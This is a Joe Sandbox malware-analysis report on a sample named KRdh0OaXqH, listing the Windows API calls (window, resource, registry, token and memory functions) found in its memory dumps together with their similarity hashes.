                                                                                            • Source File: 00000001.00000002.3291039179.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.3291012690.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291116404.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291137046.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291162075.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291192376.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_KRdh0OaXqH.jbxd
                                                                                            Similarity
                                                                                            • API ID: CursorDesktopWindow$Show
                                                                                            • String ID:
                                                                                            • API String ID: 2074268717-0
                                                                                            • Opcode ID: bdf797e27c36325bb8c82eddb0fe25cd735ab4185a90c7389a74a707800caf49
                                                                                            • Instruction ID: b367783c8e347dee620bf4ebb942fef05e7de29136c442ebf2d1f3a12f6593d4
                                                                                            • Opcode Fuzzy Hash: bdf797e27c36325bb8c82eddb0fe25cd735ab4185a90c7389a74a707800caf49
                                                                                            • Instruction Fuzzy Hash: 14415C75700250AFCB10EF39E984B9677E1AB64325F16807BE404CB365DA38ED91CF9A
                                                                                            APIs
                                                                                            • GetModuleFileNameA.KERNEL32(00400000,?,00000100), ref: 00408A7D
                                                                                            • LoadStringA.USER32(00400000,0000FF9E,?,00000040), ref: 00408AEC
                                                                                            • LoadStringA.USER32(00400000,0000FF9F,?,00000040), ref: 00408B87
                                                                                            • MessageBoxA.USER32(00000000,?,?,00002010), ref: 00408BC6
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.3291039179.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.3291012690.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291116404.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291137046.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291162075.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291192376.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_KRdh0OaXqH.jbxd
                                                                                            Similarity
                                                                                            • API ID: LoadString$FileMessageModuleName
                                                                                            • String ID:
                                                                                            • API String ID: 704749118-0
                                                                                            • Opcode ID: e5f82f84354ef0ca283ae45606e551eda4c159cf8a0135734a08b6be587c5a6c
                                                                                            • Instruction ID: 4dc4f8fa8e31f5a504acc487101d04bf7196a45c85b280592f63b9c2e46bb1d6
                                                                                            • Opcode Fuzzy Hash: e5f82f84354ef0ca283ae45606e551eda4c159cf8a0135734a08b6be587c5a6c
                                                                                            • Instruction Fuzzy Hash: 933154706083849EE330EB65C945BDB77E89B86304F40483FB6C8D72D1DB79A9088767
                                                                                            APIs
                                                                                            • SendMessageA.USER32(00000000,000001A1,?,00000000), ref: 0044E161
                                                                                              • Part of subcall function 0044C7A4: SendMessageA.USER32(00000000,000001A0,?,00000000), ref: 0044C7D6
                                                                                            • InvalidateRect.USER32(00000000,00000000,00000001,00000000,000001A1,?,00000000), ref: 0044E1E5
                                                                                              • Part of subcall function 0042BBC4: SendMessageA.USER32(00000000,0000018E,00000000,00000000), ref: 0042BBD8
                                                                                            • IsRectEmpty.USER32(?), ref: 0044E1A7
                                                                                            • ScrollWindowEx.USER32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000006), ref: 0044E1CA
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.3291039179.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.3291012690.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291116404.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291137046.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291162075.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291192376.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_KRdh0OaXqH.jbxd
                                                                                            Similarity
                                                                                            • API ID: MessageSend$Rect$EmptyInvalidateScrollWindow
                                                                                            • String ID:
                                                                                            • API String ID: 855768636-0
                                                                                            • Opcode ID: 9a7a18137ec586f3ae39864321f244483684a0ffa01bccee3b65953e1ffa7791
                                                                                            • Instruction ID: 2ff42263b9fd8d0bf3ebcb41181b8f96e25d68336b74147511caae446a0df0b7
                                                                                            • Opcode Fuzzy Hash: 9a7a18137ec586f3ae39864321f244483684a0ffa01bccee3b65953e1ffa7791
                                                                                            • Instruction Fuzzy Hash: A8114A72B4030127E310BA7E9C86B5B76899B88748F05483FB506EB383DEB9DC094399
                                                                                            APIs
                                                                                            • OffsetRect.USER32(?,?,00000000), ref: 00493DE8
                                                                                            • OffsetRect.USER32(?,00000000,?), ref: 00493E03
                                                                                            • OffsetRect.USER32(?,?,00000000), ref: 00493E1D
                                                                                            • OffsetRect.USER32(?,00000000,?), ref: 00493E38
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.3291039179.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.3291012690.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291116404.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291137046.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291162075.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291192376.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_KRdh0OaXqH.jbxd
                                                                                            Similarity
                                                                                            • API ID: OffsetRect
                                                                                            • String ID:
                                                                                            • API String ID: 177026234-0
                                                                                            • Opcode ID: cfbccf1d698e82d79065cf95299db1547cf674505700e5d727bb5bb08f6f6c11
                                                                                            • Instruction ID: 626cbd3239d4ed1d666785e4d5506dc5f63added092c4cfac4a9a75855a5826e
                                                                                            • Opcode Fuzzy Hash: cfbccf1d698e82d79065cf95299db1547cf674505700e5d727bb5bb08f6f6c11
                                                                                            • Instruction Fuzzy Hash: EF217AB6704201AFD700DE69CD85EABBBEEEBC4304F14CA2AF554C7249D634ED0487A6
                                                                                            APIs
                                                                                            • GetCursorPos.USER32 ref: 00417270
                                                                                            • SetCursor.USER32(00000000), ref: 004172B3
                                                                                            • GetLastActivePopup.USER32(?), ref: 004172DD
                                                                                            • GetForegroundWindow.USER32(?), ref: 004172E4
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.3291039179.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.3291012690.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291116404.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291137046.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291162075.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291192376.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_KRdh0OaXqH.jbxd
                                                                                            Similarity
                                                                                            • API ID: Cursor$ActiveForegroundLastPopupWindow
                                                                                            • String ID:
                                                                                            • API String ID: 1959210111-0
                                                                                            • Opcode ID: 8d64426bf1faa67f7e63d5b49e58984f19945b6ec6e4dfcc44bb455274275b92
                                                                                            • Instruction ID: d42235d32f12bbd537443306c781531a61dc82822ae97907460fdfc4b9dfd860
                                                                                            • Opcode Fuzzy Hash: 8d64426bf1faa67f7e63d5b49e58984f19945b6ec6e4dfcc44bb455274275b92
                                                                                            • Instruction Fuzzy Hash: E02183313086018BCB20EB69D885AD773B1AB44758F4545ABF895CB352D73DDC82CB89
                                                                                            APIs
                                                                                            • MulDiv.KERNEL32(?,00000008,?), ref: 00493A51
                                                                                            • MulDiv.KERNEL32(?,00000008,?), ref: 00493A65
                                                                                            • MulDiv.KERNEL32(?,00000008,?), ref: 00493A79
                                                                                            • MulDiv.KERNEL32(?,00000008,?), ref: 00493A97
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.3291039179.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.3291012690.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291116404.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291137046.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291162075.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291192376.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_KRdh0OaXqH.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: b0bc83cb44cddb6cfb83e9cff79c84a8c4632dee95d4fc6912c32f85648e17c5
                                                                                            • Instruction ID: 4fded1b76b16cf5233eb9f491647a43cf70802087f48ea21bc09c20ce05eabc8
                                                                                            • Opcode Fuzzy Hash: b0bc83cb44cddb6cfb83e9cff79c84a8c4632dee95d4fc6912c32f85648e17c5
                                                                                            • Instruction Fuzzy Hash: D011FE72604204ABCB40DEA9D8C4D9B7BECEF4D364B1541AAF918DB246D674ED408BA8
                                                                                            APIs
                                                                                            • GetClassInfoA.USER32(00400000,0041F480,?), ref: 0041F4B1
                                                                                            • UnregisterClassA.USER32(0041F480,00400000), ref: 0041F4DA
                                                                                            • RegisterClassA.USER32(00498598), ref: 0041F4E4
                                                                                            • SetWindowLongA.USER32(00000000,000000FC,00000000), ref: 0041F51F
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.3291039179.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.3291012690.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291116404.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291137046.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291162075.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291192376.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_KRdh0OaXqH.jbxd
                                                                                            Similarity
                                                                                            • API ID: Class$InfoLongRegisterUnregisterWindow
                                                                                            • String ID:
                                                                                            • API String ID: 4025006896-0
                                                                                            • Opcode ID: 9da16f95b0ca95f6f98f2aa1ee6ab2fa4b74d09379c763118f1aaf581a933dc1
                                                                                            • Instruction ID: 3ade520867520f28231aed23d56b060c1ae6e85fc3aaaf2b039856689379b016
                                                                                            • Opcode Fuzzy Hash: 9da16f95b0ca95f6f98f2aa1ee6ab2fa4b74d09379c763118f1aaf581a933dc1
                                                                                            • Instruction Fuzzy Hash: 600152B12401047BCB10EF6DED81E9B37999769314B11413BBA05E72E1DA3A9C194BAD
                                                                                            APIs
                                                                                            • FindResourceA.KERNEL32(00400000,?,00000000), ref: 0040D227
                                                                                            • LoadResource.KERNEL32(00400000,72756F73,0040A9C8,00400000,00000001,00000000,?,0040D184,00000000,?,00000000,?,?,0047B574,0000000A,REGDLL_EXE), ref: 0040D241
                                                                                            • SizeofResource.KERNEL32(00400000,72756F73,00400000,72756F73,0040A9C8,00400000,00000001,00000000,?,0040D184,00000000,?,00000000,?,?,0047B574), ref: 0040D25B
                                                                                            • LockResource.KERNEL32(74536563,00000000,00400000,72756F73,00400000,72756F73,0040A9C8,00400000,00000001,00000000,?,0040D184,00000000,?,00000000,?), ref: 0040D265
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.3291039179.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.3291012690.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291116404.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291137046.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291162075.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291192376.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_KRdh0OaXqH.jbxd
                                                                                            Similarity
                                                                                            • API ID: Resource$FindLoadLockSizeof
                                                                                            • String ID:
                                                                                            • API String ID: 3473537107-0
                                                                                            • Opcode ID: 98a3eb2f97eb90f8deac50020965559c1c53970ac69ea9c81a72a03a0abc3839
                                                                                            • Instruction ID: 8b55825d53d46818f15098a3aa340eb6897fe62b828c159971ec5f2842f97e2f
                                                                                            • Opcode Fuzzy Hash: 98a3eb2f97eb90f8deac50020965559c1c53970ac69ea9c81a72a03a0abc3839
                                                                                            • Instruction Fuzzy Hash: ADF062736046046F8704EE9DA881D5B77ECDE88364310017FF908EB246DA38DD018B78
                                                                                            APIs
                                                                                            • RtlInitializeCriticalSection.KERNEL32(0049A420,00000000,00401A82,?,?,0040222E,021E1A68,?,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 004019E2
                                                                                            • RtlEnterCriticalSection.KERNEL32(0049A420,0049A420,00000000,00401A82,?,?,0040222E,021E1A68,?,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 004019F5
                                                                                            • LocalAlloc.KERNEL32(00000000,00000FF8,0049A420,00000000,00401A82,?,?,0040222E,021E1A68,?,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 00401A1F
                                                                                            • RtlLeaveCriticalSection.KERNEL32(0049A420,00401A89,00000000,00401A82,?,?,0040222E,021E1A68,?,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 00401A7C
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.3291039179.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.3291012690.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291116404.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291137046.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291162075.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291192376.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_KRdh0OaXqH.jbxd
                                                                                            Similarity
                                                                                            • API ID: CriticalSection$AllocEnterInitializeLeaveLocal
                                                                                            • String ID:
                                                                                            • API String ID: 730355536-0
                                                                                            • Opcode ID: 32c3f79555f68ec1bc11d54ffe7e2d8c2f8c3d101e81e839edcab80f59bb9ff8
                                                                                            • Instruction ID: b5067cfae5201e79e85213ffc863b03902d2ba9507e13bed97c350dada6f2a02
                                                                                            • Opcode Fuzzy Hash: 32c3f79555f68ec1bc11d54ffe7e2d8c2f8c3d101e81e839edcab80f59bb9ff8
                                                                                            • Instruction Fuzzy Hash: 9C01C0706442405EFB19AB69980A7263ED4D79574CF11803BF840A6AF1CAFC48A0CBAF
                                                                                            APIs
                                                                                            • GetLastError.KERNEL32(00000000,00000000), ref: 0046EE29
                                                                                            Strings
                                                                                            • Failed to set NTFS compression state (%d)., xrefs: 0046EE3A
                                                                                            • Unsetting NTFS compression on directory: %s, xrefs: 0046EE0F
                                                                                            • Setting NTFS compression on directory: %s, xrefs: 0046EDF7
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.3291039179.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.3291012690.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291116404.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291137046.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291162075.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291192376.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_KRdh0OaXqH.jbxd
                                                                                            Similarity
                                                                                            • API ID: ErrorLast
                                                                                            • String ID: Failed to set NTFS compression state (%d).$Setting NTFS compression on directory: %s$Unsetting NTFS compression on directory: %s
                                                                                            • API String ID: 1452528299-1392080489
                                                                                            • Opcode ID: 69acb3433b7424efc8733916a2e3fd5d2b01e13f314b1d1949af057b0dba6a86
                                                                                            • Instruction ID: 1e7f5b79b7b83b0710ae0b74761658cb8013dc9fe861025df3af78f0f88b0ad9
                                                                                            • Opcode Fuzzy Hash: 69acb3433b7424efc8733916a2e3fd5d2b01e13f314b1d1949af057b0dba6a86
                                                                                            • Instruction Fuzzy Hash: B1016734E0824856CF04D7EEA0412DDBBE49F09314F4485EFA855DB383EB7A0A0987AB
                                                                                            APIs
                                                                                              • Part of subcall function 0042DD44: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,00481F57,?,00000001,?,?,00481F57,?,00000001,00000000), ref: 0042DD60
                                                                                            • RegDeleteValueA.ADVAPI32(?,00000000,00000082,00000002,00000000,?,?,00000000,0045AECE,?,?,?,?,?,00000000,0045AEF5), ref: 004552F4
                                                                                            • RegCloseKey.ADVAPI32(00000000,?,00000000,00000082,00000002,00000000,?,?,00000000,0045AECE,?,?,?,?,?,00000000), ref: 004552FD
                                                                                            • RemoveFontResourceA.GDI32(00000000), ref: 0045530A
                                                                                            • SendNotifyMessageA.USER32(0000FFFF,0000001D,00000000,00000000), ref: 0045531E
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.3291039179.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.3291012690.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291116404.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291137046.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291162075.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291192376.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_KRdh0OaXqH.jbxd
                                                                                            Similarity
                                                                                            • API ID: CloseDeleteFontMessageNotifyOpenRemoveResourceSendValue
                                                                                            • String ID:
                                                                                            • API String ID: 4283692357-0
                                                                                            • Opcode ID: 697a476951aa0a0ca9570e552bc061f69c865505889b6d894dbdf5d1e046680c
                                                                                            • Instruction ID: 219cbfe3a978a329188234ed78272d854ba8405160bd4c7ea72be768510c46b8
                                                                                            • Opcode Fuzzy Hash: 697a476951aa0a0ca9570e552bc061f69c865505889b6d894dbdf5d1e046680c
                                                                                            • Instruction Fuzzy Hash: A3F05EB574070036EA10B6B69C87F2F268C9F98746F10483BBA04EF2C3D97CD804562D
                                                                                            APIs
                                                                                            • GetLastError.KERNEL32(0000003C,00000000), ref: 0046F5D5
                                                                                            Strings
                                                                                            • Failed to set NTFS compression state (%d)., xrefs: 0046F5E6
                                                                                            • Setting NTFS compression on file: %s, xrefs: 0046F5A3
                                                                                            • Unsetting NTFS compression on file: %s, xrefs: 0046F5BB
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.3291039179.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.3291012690.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291116404.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291137046.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291162075.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291192376.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_KRdh0OaXqH.jbxd
                                                                                            Similarity
                                                                                            • API ID: ErrorLast
                                                                                            • String ID: Failed to set NTFS compression state (%d).$Setting NTFS compression on file: %s$Unsetting NTFS compression on file: %s
                                                                                            • API String ID: 1452528299-3038984924
                                                                                            • Opcode ID: 2ae6e740da7d12cab45fc3fda2904aab771333dfed4c0176c99f618606694c86
                                                                                            • Instruction ID: af1263a2bc2d08d5f84e5bf4467a93fc8ad6fd7f39d305876acfad47ab44e8ff
                                                                                            • Opcode Fuzzy Hash: 2ae6e740da7d12cab45fc3fda2904aab771333dfed4c0176c99f618606694c86
                                                                                            • Instruction Fuzzy Hash: 43016C30D0824865CF14DB9DA0412DDBBE49F09314F5485FFA895DB343EA790A0D8BAB
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.3291039179.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.3291012690.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291116404.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291137046.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291162075.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291192376.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_KRdh0OaXqH.jbxd
                                                                                            Similarity
                                                                                            • API ID: ErrorLast$CountSleepTick
                                                                                            • String ID:
                                                                                            • API String ID: 2227064392-0
                                                                                            • Opcode ID: 0d6abcf2624c376c92be4fe051ac8c721ea0e8e4158ee005a25feb70aac8199d
                                                                                            • Instruction ID: 04319ed9576db886230fb9bc867ee798ddcaac356600663dffa6fb38092a16ff
                                                                                            • Opcode Fuzzy Hash: 0d6abcf2624c376c92be4fe051ac8c721ea0e8e4158ee005a25feb70aac8199d
                                                                                            • Instruction Fuzzy Hash: 70E09B7230954149DA2935BF28C67BF5588CBC5764F145D3FF08DD6282C91C4C4796BE
                                                                                            APIs
                                                                                            • GetCurrentProcess.KERNEL32(00000008,?,?,?,00000001,00000000,00000002,00000000,0047F8E7,?,?,?,?,?,0049719A,00000000), ref: 00476CB5
                                                                                            • OpenProcessToken.ADVAPI32(00000000,00000008,?,?,?,00000001,00000000,00000002,00000000,0047F8E7,?,?,?,?,?,0049719A), ref: 00476CBB
                                                                                            • GetTokenInformation.ADVAPI32(00000008,00000012(TokenIntegrityLevel),00000000,00000004,00000008,00000000,00000008,?,?,?,00000001,00000000,00000002,00000000,0047F8E7), ref: 00476CDD
                                                                                            • CloseHandle.KERNEL32(00000000,00000008,TokenIntegrityLevel,00000000,00000004,00000008,00000000,00000008,?,?,?,00000001,00000000,00000002,00000000,0047F8E7), ref: 00476CEE
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.3291039179.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.3291012690.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291116404.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291137046.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291162075.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291192376.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_KRdh0OaXqH.jbxd
                                                                                            Similarity
                                                                                            • API ID: ProcessToken$CloseCurrentHandleInformationOpen
                                                                                            • String ID:
                                                                                            • API String ID: 215268677-0
                                                                                            • Opcode ID: 643da1b25484e25618dfc2f33770e0810dba7622c7134d6ef75615b708b11c8e
                                                                                            • Instruction ID: 52cacee470f693cc175e787ed480d05e054b7fb82800b5b9fad0ca038f03fef1
                                                                                            • Opcode Fuzzy Hash: 643da1b25484e25618dfc2f33770e0810dba7622c7134d6ef75615b708b11c8e
                                                                                            • Instruction Fuzzy Hash: 04F01CA16447016ED600EAB5CD82A9B76DCEB44354F04883ABE98C72C1D678D808AA66
                                                                                            APIs
                                                                                            • GetLastActivePopup.USER32(?), ref: 0042425C
                                                                                            • IsWindowVisible.USER32(?), ref: 0042426D
                                                                                            • IsWindowEnabled.USER32(?), ref: 00424277
                                                                                            • SetForegroundWindow.USER32(?), ref: 00424281
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.3291039179.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.3291012690.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291116404.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291137046.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291162075.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291192376.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_KRdh0OaXqH.jbxd
                                                                                            Similarity
                                                                                            • API ID: Window$ActiveEnabledForegroundLastPopupVisible
                                                                                            • String ID:
                                                                                            • API String ID: 2280970139-0
                                                                                            • Opcode ID: 815aaf66aeb93fdb7eaca90ddf7e3ec79125ce151ba931028ab749093d5bac7c
                                                                                            • Instruction ID: cc3e18b4355afb8de1117362fa5ee1cc3bb5bcb08e60588071b409dab7082488
                                                                                            • Opcode Fuzzy Hash: 815aaf66aeb93fdb7eaca90ddf7e3ec79125ce151ba931028ab749093d5bac7c
                                                                                            • Instruction Fuzzy Hash: DBE08691B02571929E71FA671881A9F018CCD45BE434602A7FD04F7243DB1CCC0041BC
                                                                                            APIs
                                                                                            • GlobalHandle.KERNEL32 ref: 00406287
                                                                                            • GlobalUnlock.KERNEL32(00000000), ref: 0040628E
                                                                                            • GlobalReAlloc.KERNEL32(00000000,00000000), ref: 00406293
                                                                                            • GlobalLock.KERNEL32(00000000), ref: 00406299
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.3291039179.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.3291012690.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291116404.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291137046.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291162075.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291192376.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
